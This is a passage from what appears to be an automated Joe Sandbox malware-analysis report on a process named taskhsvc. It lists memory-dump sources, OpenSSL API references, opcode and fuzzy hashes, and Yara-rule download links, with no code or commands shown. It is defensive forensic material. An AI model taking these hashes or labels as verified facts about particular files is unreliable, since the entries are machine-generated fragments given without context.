                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: CipherInitJ_obj2nidS12_S12_item_decrypt_d2iS_itX_initlh_retrieve
                                                            • String ID:
                                                            • API String ID: 3703912448-0
                                                            • Opcode ID: aa72af66d2907b6b8f594c7d17085940ebcbb5109934a95df4904746aec25a2d
                                                            • Instruction ID: 008024a59f336b27fc96ddcf4e71a156cc0f739a1d92e900987e0f03868ba194
                                                            • Opcode Fuzzy Hash: aa72af66d2907b6b8f594c7d17085940ebcbb5109934a95df4904746aec25a2d
                                                            • Instruction Fuzzy Hash: A20113755083009FCB00DF2AD684A4BFBF4EB88358F068D59E9988B711D331E809CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE248E7 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$O_free
                                                            • String ID:
                                                            • API String ID: 1526627863-0
                                                            • Opcode ID: 9447cbd91d16b8b838fd1760137aac655fde4c8c14b3c385d604200ab1d8c105
                                                            • Instruction ID: 63abdc4ecc4e499c4ff2d018c9f4ce1272bff6fe0866fd3264b0a69f128f020c
                                                            • Opcode Fuzzy Hash: 9447cbd91d16b8b838fd1760137aac655fde4c8c14b3c385d604200ab1d8c105
                                                            • Instruction Fuzzy Hash: 1911F2B0A293419EEB089F21D44178ABBF0FB42308F20880EE4988BB51C3BDC445CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE248C9 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$O_free
                                                            • String ID:
                                                            • API String ID: 1526627863-0
                                                            • Opcode ID: 14eaf82bc2a7e005ba14cd25c5f5ee67c7c76c8adf863941ab84d22fa089b2a6
                                                            • Instruction ID: 1e8876c0075cd9adc083b3dd9b8b6e6011a0c4dcbc36678bec7ebe2ec444b728
                                                            • Opcode Fuzzy Hash: 14eaf82bc2a7e005ba14cd25c5f5ee67c7c76c8adf863941ab84d22fa089b2a6
                                                            • Instruction Fuzzy Hash: 2C11C2B09293409EEB049F21D44538ABBF0FF46308F60880EE5D847B51C7BD9449CF52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE4CE80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenSSLDie.LIBEAY32 ref: 6CE4CF0F
                                                              • Part of subcall function 6CE22620: OPENSSL_showfatal.LIBEAY32 ref: 6CE2280D
                                                            • AES_decrypt.LIBEAY32 ref: 6CE4CFBB
                                                            • OpenSSLDie.LIBEAY32 ref: 6CE4D077
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Open$L_showfatalS_decrypt
                                                            • String ID: X
                                                            • API String ID: 3858874810-3081909835
                                                            • Opcode ID: 3954b02b03c4bdd9e5da3eeb09c9d8432c2e813a21e9d930e29b9d8095d648bd
                                                            • Instruction ID: c78c24b1e0b5e9dcd6f1b617ee708690c8dccd3822f4eaa2d25bbb917477246f
                                                            • Opcode Fuzzy Hash: 3954b02b03c4bdd9e5da3eeb09c9d8432c2e813a21e9d930e29b9d8095d648bd
                                                            • Instruction Fuzzy Hash: F251A079A097418FD714CF19D180A0AFBF1BF88214F25CA5EE9989B711D730E951CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE2AD39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocstrlen
                                                            • String ID: h
                                                            • API String ID: 3192733237-2439710439
                                                            • Opcode ID: 7310366926cadf4ceef807de108e3d4322defc61cd9ce3ed3e692a15771455e2
                                                            • Instruction ID: 2913633a8424950798d00c52304edc2c5079e261b8e439ca8722e776859025c7
                                                            • Opcode Fuzzy Hash: 7310366926cadf4ceef807de108e3d4322defc61cd9ce3ed3e692a15771455e2
                                                            • Instruction Fuzzy Hash: 860124745486018BD711CF28C14135ABBF1BF4A708F208A5CD8999B700E338D946CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE2AC77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$O_mallocR_put_errorstrlen
                                                            • String ID: h
                                                            • API String ID: 504393152-2439710439
                                                            • Opcode ID: 8c8591f0d9e4c5ec74bb7b8dfa9b090ae87e8c350aa9dbf9b65f6e49efb275bf
                                                            • Instruction ID: e20b83f55849e1dc46cbfaef00b64edf06df30ef452bdb60fea1f17beb697b88
                                                            • Opcode Fuzzy Hash: 8c8591f0d9e4c5ec74bb7b8dfa9b090ae87e8c350aa9dbf9b65f6e49efb275bf
                                                            • Instruction Fuzzy Hash: 43F030715486148FD700CF29C58034AB7F1BF45718F65CA58D8999B704D738E905CFC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE58F80 Relevance: 3.4, APIs: 2, Instructions: 359COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: T_encrypt
                                                            • String ID:
                                                            • API String ID: 2450657872-0
                                                            • Opcode ID: b0099d8cb121efd5d654878b54f32b878112570f27a74e74b29b553ec4dc4ea2
                                                            • Instruction ID: 1d17764754f04504e4a62a6a0e97fd7ddbb2044a58a7372c5b6f450b0186b33e
                                                            • Opcode Fuzzy Hash: b0099d8cb121efd5d654878b54f32b878112570f27a74e74b29b553ec4dc4ea2
                                                            • Instruction Fuzzy Hash: 71E17073F201614FDB88CE69D5D062A77B3EBCA390B4B8568DA0657386CB70F815CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF0AE70 Relevance: 86.1, APIs: 47, Strings: 2, Instructions: 335COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BIO_s_file.LIBEAY32 ref: 6CF0AE8E
                                                            • BIO_new.LIBEAY32 ref: 6CF0AE96
                                                              • Part of subcall function 6CEC4560: CRYPTO_malloc.LIBEAY32 ref: 6CEC458C
                                                            • ERR_put_error.LIBEAY32 ref: 6CF0B2C7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
